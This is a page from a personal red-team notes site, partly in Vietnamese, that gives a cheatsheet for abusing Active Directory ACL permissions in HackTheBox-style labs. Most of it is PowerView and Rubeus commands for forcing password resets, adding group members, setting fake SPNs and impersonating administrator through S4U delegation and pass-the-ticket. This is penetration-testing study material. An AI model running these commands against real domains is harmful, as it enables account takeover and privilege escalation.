🐸
endy's notes
  • 👋Welcome
  • 💁Blog linh tinh
    • HTB CPTS - review linh tinh
  • 🥷Red Teaming
    • HackTheBox Writeup
      • Web Challanges
      • Machine
    • Priv Escalation
      • 🪟Windows Priv Escalation
        • Windows User Privileges
        • Windows Built-in Groups
        • Attacking the OS
        • Credential Theft
        • Others Techniques
      • 🐧Linux Priv Escalation
    • C2
      • Sliver
    • Active Directory
      • Enumeration
      • Credentials Access
        • Kerberoasting
        • ASREPRoasting
        • DCSync
      • ACL Abuse
        • Khái niệm cơ bản
        • ACL Enumeration
        • Abuse some ACL
      • AD Trust
        • Khái niệm cơ bản
        • Enum AD Trust
        • Attack Child -> Parent Trusts
        • Attack Cross-Forest Trust
    • Lateral Movement
      • Cheatsheet
      • Lateral Movement 101
        • Impacket
        • Windows component
  • 🕸️Web Security
    • XS Leak
    • Java Sec Learn
      • Java Memory shell
        • General
        • Memshell in Tomcat
        • Deserialize to memshell in Tomcat
        • Memshell in Spring
        • Deserialize to memshell in Spring
        • Java Agent Memshell - Demo inject memshell in Jira
    • .Net Sec Learn
      • 🔀.NET Deserialize
        • Làm quen với .NET Serialization
        • Serializer - XmlSerializer và ObjectDataProvider chain
        • Formatter - một vài chain của BinaryFormatter
        • LosFormatter - ViewState deserialize
  • ⛳CTF Writeups
    • Writeup KMA CTF 2024
    • TetCTF2024
      • Hello from API GW (100)
      • Microservices (200)
      • LordGPT
      • X Ét Ét
    • SVATT Cấp học viện 2023
    • KMA CTF 2023
    • TetCTF 2023
    • DiceCTF 2023
Powered by GitBook
On this page
  • ForceChangePassword
  • GenericWrite
  • AllowedToDelegate
  1. Red Teaming
  2. Active Directory
  3. ACL Abuse

Abuse some ACL

Just another cheatsheet

PreviousACL EnumerationNextAD Trust

Last updated 2 months ago

ForceChangePassword

Import .\Power-View.ps1
Set-DomainUserPassword -Domain painters.htb -Identity blake -AccountPassword (ConvertTo-SecureString 'Password123!' -AsPlainText -Force) -Verbose

GenericWrite

Add user to group

$SecPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\damundsen', $SecPassword)
Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'damundsen' -Credential $Cred -Verbose

Add fake SPN

Set-DomainObject -Credential $Cred -Identity adunn -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose

Remove SPN

Set-DomainObject -Credential $Cred -Identity adunn -Clear serviceprincipalname -Verbose

AllowedToDelegate

Khái niệm delegate:

User has to have an attribute TRUSTED_TO_AUTH_FOR_DELEGATION in order for it to be able to authenticate to the remote service.

TRUSTED_TO_AUTH_FOR_DELEGATION - (Windows 2000/Windows Server 2003) The account is enabled for delegation. This is a security-sensitive setting. Accounts that have this option enabled should be tightly controlled. This setting lets a service that runs under the account assume a client's identity and authenticate as that user to other remote servers on the network.

https://support.microsoft.com/en-gb/help/305144/how-to-use-useraccountcontrol-to-manipulate-user-account-properties

Check msds bằng Powerview

Get-NetUser -TrustedToAuth

Dump RC4 từ cleartext password

Rubeus.exe hash /domain:"DC.painters.htb" /user:"blake" /password:"Password123!"

Pass the ticket

Rubeus.exe s4u /nowrap /msdsspn:"cifs/DC.painters.htb" /impersonateuser:"administrator" /domain:"painters.htb" /user:"blake" /rc4:"2B576ACBE6BCFDA7294D6BD18041B8FE" /ptt
🥷